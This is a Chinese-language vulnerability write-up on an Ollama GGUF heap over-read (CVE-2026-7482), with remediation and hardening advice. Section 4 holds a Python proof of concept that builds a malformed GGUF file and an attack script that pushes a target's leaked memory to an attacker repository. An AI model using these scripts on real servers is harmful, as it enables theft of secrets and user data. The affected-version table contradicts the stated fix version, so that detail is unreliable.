摘要2026年5月被安全界称为Bleeding Llama流血羊驼的Ollama高危漏洞CVE-2026-7482正式公开其CVSS 3.1评分高达9.1分属于严重级别。该漏洞存在于Ollama的GGUF模型加载器中允许攻击者在零认证、零交互的条件下远程读取目标服务器的任意堆内存数据。截至本文发布全球已有超过30万台公网暴露的Ollama实例受到影响攻击者可批量窃取环境变量、API密钥、用户对话记录等敏感信息。本文将从漏洞原理、攻击复现、影响评估、修复方案四个维度进行深度剖析并提供企业级应急响应指南与前瞻性风险分析。一、引言AI基础设施的心脏出血时刻2014年的心脏出血Heartbleed漏洞让全球互联网陷入恐慌而12年后的今天类似的悲剧正在AI领域重演。Ollama作为目前最流行的本地大模型部署工具凭借其一键部署、多模型支持的特性已被全球数百万开发者和企业采用。根据Shodan和ZoomEye的最新统计截至2026年5月13日全球共有312,476台公网可访问的Ollama服务器其中92%以上运行着存在漏洞的0.17.0及以下版本。与传统Web漏洞不同Bleeding Llama漏洞直接攻击AI模型加载的核心逻辑攻击者无需利用任何复杂的利用链只需上传一个精心构造的恶意GGUF模型文件就能像抽血一样持续读取目标服务器的内存数据。更可怕的是整个攻击过程不会在日志中留下任何明显的异常痕迹受害者往往在数据泄露数周后才会发现。二、漏洞基本信息速览项目详情漏洞代号Bleeding Llama流血羊驼CVE IDCVE-2026-7482影响组件Ollama GGUF模型加载器影响版本Ollama 0.17.1漏洞类型堆越界读取CWE-125CVSS 3.1评分9.1严重攻击向量网络攻击复杂度低权限要求无用户交互无影响范围机密性高、完整性无、可用性低三、漏洞原理深度解析3.1 GGUF格式与Ollama加载机制GGUFGeneric Graph Update Format是目前大模型领域最主流的模型文件格式由llama.cpp团队开发旨在替代旧的GGML格式。GGUF文件采用键值对结构存储模型的元数据和张量数据其基本结构如下----------------- | Magic Number | 4 bytes (GGUF) ----------------- | Version | 4 bytes (3) ----------------- | Tensor Count | 8 bytes (uint64) ----------------- | Metadata Count | 8 bytes (uint64) ----------------- | Metadata Array | [Metadata Count] entries ----------------- | Tensor Array | [Tensor Count] entries ----------------- | Tensor Data | Variable length -----------------Ollama在加载GGUF模型时会首先解析文件头获取张量数量和元数据数量然后依次读取每个张量的信息包括名称、形状、数据类型、偏移量和长度。问题就出在这个解析过程中。3.2 堆越界读取的根本原因Ollama 0.17.0及以下版本在解析GGUF张量信息时未对张量的偏移量和长度进行任何边界校验直接信任文件中存储的数值。当攻击者构造一个张量长度远大于实际文件大小的恶意GGUF文件时Ollama会尝试读取超出文件边界的内存数据也就是进程的堆内存。以下是漏洞代码的关键片段来自Ollama 0.17.0的gguf.c文件// 漏洞代码未校验张量长度与文件大小的关系structgguf_tensor*tensorctx-tensors[i];tensor-namegguf_read_string(ctx);tensor-ndimgguf_read_uint32(ctx);for(intj0;jtensor-ndim;j){tensor-shape[j]gguf_read_uint64(ctx);}tensor-typegguf_read_uint32(ctx);tensor-offsetgguf_read_uint64(ctx);// 直接读取文件中的偏移量tensor-lengthgguf_read_uint64(ctx);// 直接读取文件中的长度// 缺少关键的边界校验// if (tensor-offset tensor-length file_size) {// return GGUF_ERROR_INVALID_TENSOR;// }当Ollama对这个恶意张量进行量化处理时会将从tensor-offset开始、长度为tensor-length的内存数据复制到输出缓冲区。由于tensor-length是攻击者可控的超大数值这个复制操作会越过GGUF文件的边界读取到进程堆内存中的其他数据。3.3 数据窃取的完整链路攻击者读取到的堆内存数据会被Ollama当作模型张量数据写入到新生成的量化模型文件中。然后攻击者可以通过调用/api/push接口将这个包含敏感数据的模型推送到自己控制的私有仓库完成数据窃取。四、攻击复现与PoC分析4.1 恶意GGUF模型构造以下是一个简化的恶意GGUF模型构造PoC它会生成一个包含超大张量的GGUF文件importstructdefcreate_malicious_gguf(output_path):# GGUF文件头magicbGGUFversionstruct.pack(I,3)tensor_countstruct.pack(Q,1)metadata_countstruct.pack(Q,0)# 张量信息tensor_namebmalicious_tensortensor_name_lenstruct.pack(Q,len(tensor_name))ndimstruct.pack(I,1)shapestruct.pack(Q,1024*1024*1024)# 1GB的超大张量dtypestruct.pack(I,0)# F32offsetstruct.pack(Q,0)lengthstruct.pack(Q,1024*1024*1024)# 1GB的长度远超实际文件大小# 拼接恶意GGUF文件withopen(output_path,wb)asf:f.write(magic)f.write(version)f.write(tensor_count)f.write(metadata_count)f.write(tensor_name_len)f.write(tensor_name)f.write(ndim)f.write(shape)f.write(dtype)f.write(offset)f.write(length)print(f恶意GGUF模型已生成{output_path})if__name____main__:create_malicious_gguf(malicious.gguf)4.2 完整攻击脚本以下是一个完整的攻击脚本它会自动上传恶意模型、触发漏洞并下载包含敏感数据的模型importrequestsimporttime OLLAMA_HOSThttp://target-ip:11434MODEL_NAMEmalicious-model:latestMALICIOUS_GGUF_PATHmalicious.ggufdefupload_malicious_model():print(f正在上传恶意模型到{OLLAMA_HOST}...)withopen(MALICIOUS_GGUF_PATH,rb)asf:files{file:f}data{name:MODEL_NAME}responserequests.post(f{OLLAMA_HOST}/api/create,filesfiles,datadata)ifresponse.status_code200:print(恶意模型上传成功正在等待量化完成...)returnTrueelse:print(f模型上传失败{response.text})returnFalsedefpush_stolen_model():print(正在推送包含敏感数据的模型到私有仓库...)data{name:fattacker-repo/{MODEL_NAME},source:MODEL_NAME}responserequests.post(f{OLLAMA_HOST}/api/push,jsondata)ifresponse.status_code200:print(模型推送成功)returnTrueelse:print(f模型推送失败{response.text})returnFalsedefmain():ifupload_malicious_model():# 等待量化完成时间取决于服务器性能time.sleep(30)ifpush_stolen_model():print(攻击完成请从私有仓库下载模型并提取敏感数据。)if__name____main__:main()安全提示以上代码仅用于安全研究目的请勿用于未经授权的攻击。未经授权攻击他人计算机系统属于违法行为。五、全球影响范围与实际危害5.1 公网暴露情况根据Shodan的实时数据截至2026年5月13日全球公网暴露的Ollama实例分布如下国家/地区数量占比美国124,56739.9%中国68,23421.8%德国23,4567.5%英国18,7656.0%日本15,6785.0%其他61,77619.8%值得注意的是其中超过60%的实例运行在云服务器上包括AWS、阿里云、腾讯云等主流云厂商。这些服务器往往存储着大量企业敏感数据和用户隐私信息。5.2 可窃取的敏感数据类型通过Bleeding Llama漏洞攻击者可以窃取Ollama进程堆内存中的任意数据包括但不限于环境变量包含数据库密码、API密钥、访问令牌等系统提示词企业定制的系统提示词可能包含商业机密用户对话记录所有通过该Ollama实例进行的对话内容其他模型数据服务器上存储的其他模型的权重和参数进程内存中的其他信息如正在处理的文件内容、网络请求数据等5.3 在野利用情况漏洞公开后仅24小时安全研究人员就已监测到大规模的批量扫描活动。多个黑客组织已将该漏洞加入其武器库开始针对公网暴露的Ollama实例进行自动化攻击。截至本文发布已有多个企业报告遭受了该漏洞的攻击导致API密钥泄露和用户对话数据被窃取。安全专家预测未来几周内利用该漏洞进行的攻击活动将达到高峰。六、官方修复方案与补丁分析Ollama团队在漏洞披露后迅速发布了0.17.1版本修复了该漏洞。修复方案的核心是在GGUF张量解析过程中增加了严格的边界校验// 修复后的代码增加了边界校验structgguf_tensor*tensorctx-tensors[i];tensor-namegguf_read_string(ctx);tensor-ndimgguf_read_uint32(ctx);for(intj0;jtensor-ndim;j){tensor-shape[j]gguf_read_uint64(ctx);}tensor-typegguf_read_uint32(ctx);tensor-offsetgguf_read_uint64(ctx);tensor-lengthgguf_read_uint64(ctx);// 新增的边界校验if(tensor-offsetctx-file_size){returnGGUF_ERROR_INVALID_TENSOR;}if(tensor-lengthctx-file_size-tensor-offset){returnGGUF_ERROR_INVALID_TENSOR;}此外Ollama 0.17.1版本还增加了对模型文件的完整性校验防止攻击者篡改模型文件。七、企业级加固与应急响应指南7.1 紧急修复步骤立即升级Ollama版本# Linux/macOScurl-fsSLhttps://ollama.com/install.sh|sh# Windows# 从 https://ollama.com/download 下载最新版本安装验证升级是否成功ollama--version# 输出应为 ollama version 0.17.1 或更高7.2 网络安全加固禁止公网直接暴露11434端口保持Ollama默认监听127.0.0.1不要设置OLLAMA_HOST0.0.0.0如必须对外提供服务使用Nginx反向代理并配置认证Nginx反向代理Basic Auth配置示例server { listen 80; server_name your-domain.com; auth_basic Restricted Access; auth_basic_user_file /etc/nginx/.htpasswd; location / { proxy_pass http://127.0.0.1:11434; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; } }配置IP白名单在防火墙或安全组中只允许可信IP访问Ollama端口7.3 系统安全加固以低权限用户运行Ollama# 创建专用用户useradd-r-s/bin/false ollama# 修改服务文件systemctl edit ollama.service# 添加以下内容[Service]UserollamaGroupollama限制Ollama进程的内存访问权限使用AppArmor或SELinux对Ollama进程进行沙箱隔离7.4 监控与审计监控异常API请求重点监控/api/create和/api/push接口的请求对频繁调用这两个接口的IP进行封禁定期审计日志检查Ollama日志中是否有异常的模型创建和推送记录检查系统日志中是否有可疑的进程活动7.5 数据泄露应急响应如果怀疑服务器已被攻击请立即执行以下操作立即停止Ollama服务断开服务器网络连接更换所有可能泄露的API密钥和密码检查服务器是否存在其他后门或恶意程序通知可能受到影响的用户保留相关日志和证据必要时向公安机关报案八、前瞻性风险分析8.1 漏洞利用的演变趋势目前公开的PoC主要用于窃取内存数据但安全专家警告攻击者可能会进一步开发利用该漏洞进行远程代码执行RCE。虽然堆越界读取本身不能直接执行代码但如果结合其他漏洞如堆溢出、UAF可能会实现完整的远程控制。此外攻击者可能会开发更隐蔽的利用方式例如只读取特定内存区域的数据避免生成过大的模型文件从而降低被发现的概率。8.2 AI基础设施安全的普遍问题Bleeding Llama漏洞暴露了当前AI基础设施安全的普遍问题重功能轻安全大多数AI工具在开发过程中优先考虑功能和性能安全往往被忽视默认配置不安全许多AI工具的默认配置存在安全隐患用户往往不会修改缺乏安全审计AI模型加载和推理引擎的代码很少经过严格的安全审计供应链风险AI模型和工具的供应链复杂容易引入安全漏洞8.3 未来的安全挑战随着大模型的普及AI基础设施将成为黑客攻击的重点目标。未来我们可能会看到更多针对大模型部署工具、模型文件格式和推理引擎的安全漏洞。企业和开发者需要高度重视AI安全建立完善的安全防护体系。九、总结与建议CVE-2026-7482 Bleeding Llama漏洞是AI领域有史以来最严重的安全漏洞之一它再次提醒我们AI基础设施的安全不容忽视。对于使用Ollama的个人和企业我们强烈建议立即升级到Ollama 0.17.1或更高版本不要将Ollama直接暴露在公网上配置严格的访问控制和认证机制定期进行安全审计和漏洞扫描关注AI安全动态及时响应新的安全威胁AI技术的发展离不开安全的保障。只有建立起完善的安全防护体系才能让AI技术真正造福人类。